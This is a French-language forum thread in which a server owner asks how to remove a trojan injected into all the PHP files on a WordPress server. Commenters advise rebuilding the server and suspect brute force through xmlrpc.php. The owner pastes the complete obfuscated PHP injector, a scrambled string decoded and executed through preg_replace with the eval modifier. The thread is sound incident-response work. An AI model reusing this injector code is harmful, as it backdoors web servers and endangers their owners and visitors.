Un cheval de Troie a infecté tous les fichiers * .php sur mon serveur. J'ai utilisé cela pour identifier et lister tous les fichiers:
grep -nHR "$ua=strtolower" /www/* | cut -d':' -f1
Voici le code:
<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $jsikazxpyu = '6<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUd_SFSFGFS%x5c%x7860QUUI&c_UO3]Kc]55Ld]55#*<%x5c%x7825bG9}:}.}-}!#*<%x5x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj6<*K)c%x7827!hmg%x5c%x7825)!gj!|!*1?hu%x5c%x7825-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%x5c%x7x5c%x785csboe))1%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x%x5c%x7825)kV%x5c%x7878{**#k#)tutjyf%x5c%x7860%x5c%x7878%x5c%x:8297f:5297e:56-%x5c%x7878r.985:5298mg%x5c%x7825)!gj!<**2-4-bubE{h%x5c%x7825)sutcvt4)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c%-%x5c%x7825r%x5c%x780LDPT7-UFOJ%x5c%x7860GB)fubfsdXA%x5czepc}A;~!}%x5c%x787f;!|!}{;)gj}l;33bq}k;opjudovg}%x5c%))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x782f#)rrd%x5c%x782f#00;quui#>.%x5c%x7825!<***f%x5c%x7827824]25%x5c%x7824-%x5c%x7824-!%x5cx7878;0]=])0#)U!%x5c%x7827{**x5f%155%x61%160%x28%421H*WCw*[!%x5c%x7825r252]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%x7jt0*?]+^?]_%x5c%x785c}X%x5c%x7824<!%x5c%x7825tzw>!#]y76]277]y72]265]yx5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w%x5c%x78786<C%x5c%x7827&6<*rfs%x5c%x78257-y6gP7L6M7]D4]275]D:M8]Dsvmt+fmhpph#)zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)idubn%x%x5c%x7824Ypp3)%x5c%x7825cB%x5c%x7825iN}#-!tussfw)%x5c%x78!isset($GLOBALS["%x61%156%x75%156%x61"])))) { $GLOBALS["%x61%15660{66~6<&w6<%x5c%x787fw6*CW&)7gj6<*doj%x5c%x78257-C)fepif((function_exists("%x6f%142%x5f%163%x74%141%x72%164") && (u%x5c%x7825)3of)fepdof%x5c%x786057ftbcx787fw6*%x5c%x787f_*#ujox7827u%x5c%x7825)7fmji87fw6*%x5c%x787f_*#fmjgk4%x5c%x7860{6~6<tfs%x5c%x7825w6<%x5c%x787fwx5c%x7825<#762]67y]562]38y]572]+!<+{e%x5c%x7825+*!*+fepdfe{h+{x5c%x7824-%x5c%x7824y7%x5c%x7824-%x5c%x7824*<!%x5c%x7824-%5c2^-%x5c%x7825hOh%x5c%x782f#824]y8%x5c%x7824-%x5c%x7824]26%x5c%x7824-%x5c%x7824<%x5c%x786*CWtfs%x5c%x7825)7gj6<*id%x5c%x7825)ftpmdR6<*id%x5c%x785cq%x5c%x7825%x5c%x7827Y%x539]274]y85]273]y6g]273]y76]271]y7d]252]y74]256]y39]252]y83]2787fw6<*K)ftpmdXA6|7**197-2qj%x5c%x7825c%x7825c:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:^<!%x5c%x7825w%x5c%x5%x28%141%x72%162%x61%171%%73", NULL); }%x5c%x782f#M5]DgP5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y72]254]y76#<%x5c%x7825tmw!>!#]y84]27,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x7827!gj}1~!<2p%x5c%x7825%x5c%x787f!~!<##x7825s:N}#-%x5c%x7825o:W%x5c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x782%x7825%x5c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%x5c%x785c%x5c%x76Z6<.4%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x78255h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973vd},;uqpuft%x5c%x7860msvd}+;!>!}%x5c%x7827;!>>>!}_;gvc%x5c%2b%x5c%x7825)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%782f#%x5c%x782f#%x5c%x782f},;#-#}+;%x5c%x7825-q5L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]285]Ke]53Ld]5c%x7825h>EzH,2W%x5c%x7825wN;#-Ez-!>#p#%x5c%x782f#p#%x5c%787f<u%x5c%x7825V%x5c%<#opo#>b%x5c%x7825!**X)ufttj%x5c%x7822)gj!|!*nbsbq%x5c%p%x5c%x7825)54l}%x5c%x7827;%x5c%x7825!<*#bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j<#16,47R57,27R66,#%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#,*b%x5c%x7827)fepdof.)fepdof.%x5c%x782f#@#%x5c%x782fqp%x5c%x7825>5h%x5c%x7825!<*::::::-11111w6Z6<.3%x5c%x7860hA%x5<!%x5c%x7825tww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c%ftpmdXA6~6<u%x5c%x78257>%x5c%x782f7&6|7**111127-K)ebfsX%x5c%f#<%x5c%x7825tdz>#L4]271]278]y3f]51L3]84]y31M6]y3e]81#%x5c%x782f#7e~!dsfbuf%x5c%x7860gvodujpo)##-252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#jQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuvso!sboec%x78256<.msv%x5c%x7860ftsbqA7>q%x5c%x78256<%x5c%x787%x7825)}.;%x5c%x7860UQPMSVD!-id%x5c%x7825)uqpuft%x5c%x7860mspn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x5x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f<*XAZASV<*w%x5c%x7825)ppdj=tj{fpg)%x5c%x7825%x5c%x7824-%x5c%x7824*<!x5c%x7824*<!%x5c%x7825kj:!>!#]y3d]51]y35]256]y76]72!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x7860opjudovg)!gj!|c%x7825z>>2*!%x5c%x78255c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c%x7878pmpusut)tpq1%154%x28%151%x6d%160%x6c%157%x64%14!%x5c%x7825ggg)(0)%x5c%x782f+*0f(-!#]y76]277]y72%x5c%x7825z!>2<!gps)%x5c%x7825j>1<%x5c%x7825j=6[%x5c%x7825ww2]y34]68]y33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y85]82]y76]62]y300#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%x7825tww**W5j:>1<%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j782f2986+7**^%x5c%x782f%x5c%x7825r%x5c%x7878<~!!%x5c%48y]#>m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x7825)3of:op!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%x7825!>!2p%x5c%x7825!*3>?*x7825:osvufs:~:<*9-1-r%x5c%x7825)s%x5c25-bubE{h%x5c%x7825)sutcvt-#w#)ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%x51#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss%:>>1*!%x5c%x7825b:>1<x5c%x7827pd%x5c%x78256<C%x5c%x7827pd%x5c%x7}_;#)323ldfid>}&;!osvufs}%x5c%x787f;!opjudovg}k~~9{d%x5c%x7825:osvu76]258]y6g]273]y76]271]y7d]252]y74]256#<%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x782f!**#sfmc5%x5c%x785cSFWSFT%x5c%x7860%x5c%x7825}X;!sp!*#opo#>>}R;msv}.;%x5c%x%x75%156%x61"]=1; function fjfgg($n){return chr(ord($n)-1);} @N}#QwTW%x5c%x7825hIr%x5c%x785c1^4y4%x5c%x7824-%x5c%x7%x7860QUUI&b%x5c%x7825!|!*)323zbek!~!<b%x5c%7822l:!}V;3q%x5c%x7825}U;y]}R;2]},;osvufs}%x5c%x7827;mnui}&;]341]88M4P8]37]278]225]241]334]368]322]3]36error_reporting(0); preg_replace("%x2f%50%x2e%52%!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%x785c%x5c%x7825>j%x5c%x7825!*3!%x5c%x7827!825:<#64y]552]e7y]#>n%x5c%x7825<#372]58y]472]37y]Kc#<%x5c%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#3]y72]282#<!%x5c%x7825tjw!>!#]y84]275]y83]248]y83]256]y81]265]judovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c%x7#O#-#N#*%x5c%x7824%x5c%x78825!-#2#%x5c%x782f#%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*)323zbe!-#%x5c%x7860QIQ&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&]672]48y]#>s%x5c%x7825<#462]47y]252]18y]#>q%!#~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqmpef)#%12>j%x5c%x7825!|!*#91y]c9y]g2y]#>>*4-1->%x5c%x7822!ftmbg)!gj<*#k#)usbut%x5c%x7860c]265]y39]271]y83]256]y78]248]y83]256]y81]265]y72]254]y76]61]y33]68825j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%x5c%x7824-%x5c%8256|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x7825hW~%x5c%x7825fdy)##-!#~<%x7825)dfyfR%x5c%x7827tfs%x5c%x7825{hnpd!opjudovg!|!**#j{hnpd#)tutjyf%x5c%x7860opjudovg%x5c%x7822)FS,6<*msv%x5c%x78257-MSV,6<*)ujojR%x5c%x7827id%x5c%x78256<%x5c%pV%x5c%x787f%x5c%x787f%x5c%x787f%x5c%xx5c%x7825j:.2^,%x5c%x7825b:<!%xubq#%x5c%x785cq%x5c%x7825%x5c%x7827jsv%x5c%x78256<C>^#zsfvr#%x5c%x785#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x78K)fujs%x5c%x7878X6<#o]o]Y%x5c%x78257;utpI#2f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y81]273]ycq%x5c%x78257**^#zsfvr#%x5c%x785cq%x5c%g6R85,67R37,18R#>q%x5c%x7825V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*wmqnjA%x5c%x7827&6<.fmjgA%x5c%x7827doj%x5c%x78256<%x5c%x7Ysboepn)%x5c%x7825bss-%x5c%x7825r%x5c%x7878B%x5c%x782)esp>hmg%x5c%x7825!<sqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhof7825):fmji%x5c%x7878:<##:>:h%x5c%x7x782f%x5c%x7825z<jg!)%x5<%x5c%x78e%x5c%x78b%x5c%x7825w:!>!%x5c%x78246767~6<Cw65c%x7825t2w>#]y74]273]y76]%x5c%x78273qj%x5c%x78256<*Y%x5c%x7825)fnbozcYufhA%x5c%x78272qj%xt%x5c%x7825}K;%x5c%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5cx7822#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euhA)3of>%x5c%x7827rfs%x5c%x78256~6<%x5c%x7gj6<.[A%x5c%x7827&6<%x5c%x787fw6*%25c*W%x5c%x7825eN+#Qi%x5c%x785c1^W%x5c%x7825c!8242178}527}88:}334}472%x5c%x7824<!%x5c%x7825mm!>!5-t.98]K4]65]D8]86]y357-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x7867;!}6;##}C;!>>!}W;utpi}Y;tuofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpx7825%x5c%x787f!<X>b%x5c%x7825Z<#opo#>b%x5c%x7825!*##>>X)!gjZ<#o]1%x5c%x782f20QUUI7jsv%x5c%x78257UFH#2)eobs%x5c%x7860un>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7825!|!*!***b%x5c825:>:r%x5c%x7825:|:**t%x5c%x7825)m%x5c%x7825=*h%x5c%x7825)m%x5c%xc%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%!*msv%x5c%x7825)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%x5c%x78FHB%x5c%x7860SFTV%x5cx7825}&;ftmbg}%x5c%x787f;!osvufs5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x782f7#@#7%x5c%x782f7^#i25-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osvufs!~<3,j%m%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%x5c%x78604%x5c%x78223}!x7825)323ldfidk!~!<**qp%x5c%x7825!-uyf}w;*%x5c%x787f!>>%x5c%x7822!pd%x5c%x7825)%x5c%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x782782fh%x5c%x7825)n%x5c%x7825-#+I#)q%x5c%x7]y3d]51]y35]274]y4:]82]y3:]62]y4c#<!%x5c%x7825t::!>!c%x7825nfd>%x5c%x7825fdy<Cb*[%x5c%x7825h!>!%x5c%x7825tdz<pd%x5c%x7825w6Z6<.5%25!*72!%x5c%x7827!hmg%x5c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7%x7825>%x5c%x782fh%x5c%x7825:<**#57]38y]47]67y]37]88yhmg%x5c%x7825!)!gj!<2,*j%x5c%x7825!-%x66%152%x66%147%x67%42%x2c%163%x74%162%x5f%163%x70%154%x69%1644]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53jRk3%x5c%x7860{666~6<&w6<%x5c%x787fw6*CW&)7%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825mm)%x5c%x7825%x5c%x7878:-!%xfmy%x5c%x7825,3,j%x5c%x7825>j%x5c%x7825!<**3-j%x5c%x78d%x5c%x7825)+opjudovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>7>%x5c%x782f7rfs%x5c%x782567860%x5c%x785c^>Ew:Qb:Qc:W~!x5c%x7824gps)%x5c%x7825j>1<%x5c%x7825x7824b!>!%x5c%x7825yy)#}#-#%x5c%x7824-%x5c%7878:!>#]y3g]61]y3f]63]y3:]68]y76#%x7827K6<%x5c%x787fw6*3qj%x5c%xx5c%x787f_*#[k2%x5c%x7860{6:!}:]84#-!OVMM*<%x22%51%x29%51%x2978257>%x5c%x782272qj%x5c%x7825)7gj6<**2qj%x5c%x7825)hopm3qjA)qj3hopmAfw6*%x5c%x787f_*#fubfsdXk5%x5c%x78z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7825ww2)%x5c%x7825w%x5c%x7860TW~5]y83]273]y76]277#<%xx29%57%x65","%x65%166%x6%50%x22%134%x78%62%x35%165%x3a%146%x21%76%x21%50%x5c%x7825%x5c%x>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x5c%x7825cInbs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn+q5c%x7825tzw%x5c%x782f%x5c%x782#]y81]273]y76]258]y6g]273]y76]271]y7d]e>u%x5c%x7825V<#65,47R25,d7R17,67R37,#%x5c%x782fq%x5c%x7825>U3]317]445]212]445]43]321]464]284]364]6]234]342]58]24]325j,,*!|%x5c%x7824-%x5c%x7824gvodujpo!%825)tpqsut>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ox7824-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c2bd%x5c%x7825!<5h%x5c%x7825%x5c%x782f#0#%x5c%x782f*#npdc%x7825zB%x5c%x7825z>!tussfw)%x5c%x7825zW%x5ssutRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c%x7825]27]28y]#%x5c%x782fr%x5c%x7825%x5c%x%x7824!>!tus%x5c%x7860sfqmbdf)%x5c%x7825%x5c%x7824-%x5c%x782fs:~928>>%x5c%x7822:ftmbg39*56A:>:8:|:7#6#)tutjyf%x5c%x7860439275ttf/(.*)/epreg_replacezsydsjxoda'; $gwzjflvjgn = explode(chr((167-123)),'1340,60,1221,64,4846,62,5108,49,9305,24,3897,36,2006,26,842,22,8439,63,9329,64,8992,34,6815,54,8259,21,996,48,2350,54,3055,22,7632,53,4578,43,5902,59,116,41,3128,60,1462,22,1044,42,6360,42,8857,27,7459,40,7083,34,1904,37,7268,64,563,36,9026,31,9118,69,6895,64,7795,69,6253,69,6472,39,508,35,1813,30,3396,53,9187,34,1285,55,6576,56,1484,67,1760,53,6024,34,0,46,6121,63,1438,24,8624,43,7117,34,9057,30,7332,66,6959,58,3449,60,2464,59,7763,32,8015,41,3761,51,7685,57,7864,51,5199,36,8403,36,6322,38,8280,70,9699,58,8734,54,4451,67,157,32,395,47,6685,20,5695,39,2860,49,6058,63,2177,36,4351,62,2523,49,7017,66,9801,55,718,62,2138,39,2963,40,3003,52,7499,67,4728,51,9437,40,1109,54,3835,62,9900,42,653,65,5534,58,46,28,7742,21,4961,44,7398,61,2764,55,7977,38,1400,38,8056,54,4779,67,2572,47,2819,41,4621,67,10038,68,6705,51,7915,62,1582,31,8788,69,5734,43,6184,38,2742,22,3598,69,9545,61,2909,54,6511,65,297,62,5005,60,599,54,813,29,189,52,5469,65,927,69,1843,61,5339,62,2101,37,9284,21,6869,26,3285,48,3077,51,4413,38,8350,53,9942,36,8110,41,7566,66,6756,35,5235,48,5592,44,1551,31,4299,52,5401,42,7197,50,9507,38,884,43,780,33,2281,69,5843,59,8949,43,9757,44,9978,60,4940,21,1700,60,9660,39,1613,58,8912,37,3667,43,3255,30,5636,59,3710,51,8151,52,1163,58,7151,46,9393,44,3333,63,3509,52,9856,44,2686,33,864,20,4908,32,543,20,1671,29,4109,67,6632,53,2404,60,359,36,7247,21,3211,44,8566,58,5283,56,2046,55,1086,23,3188,23,2619,67,74,42,8203,56,5961,63,3561,37,5065,43,8502,64,9606,54,4518,39,241,56,4246,53,2213,68,4176,70,4557,21,5157,42,6222,31,1941,65,8884,28,3981,61,2719,23,6791,24,3812,23,9221,63,8667,67,9477,30,442,66,5443,26,6402,70,4688,40,3933,48,5777,66,4042,67,9087,31,2032,14'); $xmardksupn=substr($jsikazxpyu,(45923-35817),(48-41)); if (!function_exists('jqtycdwglc')) { function jqtycdwglc($tutcgbfyga, $uspwicgair) { $fadtmurxrp = NULL; for($fcsoyutzvq=0;$fcsoyutzvq<(sizeof($tutcgbfyga)/2);$fcsoyutzvq++) { $fadtmurxrp .= substr($uspwicgair, $tutcgbfyga[($fcsoyutzvq*2)],$tutcgbfyga[($fcsoyutzvq*2)+1]); } return $fadtmurxrp; };} $yymyiypvji="\x20\57\x2a\40\x62\172\x69\150\x67\163\x74\171\x69\162\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\61\x33\55\x31\67\x36\51\x29\54\x20\143\x68\162\x28\50\x33\66\x30\55\x32\66\x38\51\x29\54\x20\152\x71\164\x79\143\x64\167\x67\154\x63\50\x24\147\x77\172\x6a\146\x6c\166\x6a\147\x6e\54\x24\152\x73\151\x6b\141\x7a\170\x70\171\x75\51\x29\51\x3b\40\x2f\52\x20\144\x62\172\x7a\145\x70\152\x65\143\x67\40\x2a\57\x20"; $kssqaiublz=substr($jsikazxpyu,(61036-50923),(58-46)); $kssqaiublz($xmardksupn, $yymyiypvji, NULL); $kssqaiublz=$yymyiypvji; $kssqaiublz=(455-334); $jsikazxpyu=$kssqaiublz-1; ?>
Si j'essaye: find . -name *.php -type f -print0 | xargs -0 sed -i 's/[that code here]//g'
Sed ne le prendra pas. Il n'aime pas!, (,) Et éventuellement ". Crache une erreur.
Pouvez-vous penser à un moyen créatif de désinfecter tous ces fichiers? Je crois que le code peut être unique pour chaque fichier, randomisé de certaines manières ...
Le jeton "$ ua = strtolower" est présent dans chacun d'eux. Par conséquent, si je peux supprimer toutes les lignes de chaque * .php contenant "$ ua = strtolower", je peux supprimer le cheval de Troie.
1
Nuke de l'orbite. C'est le seul moyen d'être sûr.
—
Mark
Ils y arrivent via xmlrpc.php. J'ai des journaux de force brute massive ... Nous avons mis à niveau à 15.04 afin qu'ils ne puissent plus enraciner la boîte .. Au moins je pense .. rpcbind était en cours d'exécution et je sais que c'est mauvais, il reste à vérifier si la version 15.xx d'Ubuntu Server inclut rpcbind. Ils avaient un spambot sur notre dernière installation (nous avons dû réinstaller) ...
ne désinfectez pas - vous devez reconstruire et confirmer que vos paramètres et vos plugins ne vous le permettront pas.
—
schroeder
En ce qui concerne la question telle que posée, il s'agit d'une question de script bash et non d'une question d'InfoSec.
—
schroeder
D'accord. Eh bien, je veux supprimer le cheval de Troie de tous les fichiers, tout sauvegarder, puis réinstaller. Nous bloquerons le point d'entrée de l'attaquant. Nous pensons que cela est lié à la force brute et placer un reCAPTCHA sur toutes nos connexions Wordpress pourrait résoudre le problème.
—
Charles Thompson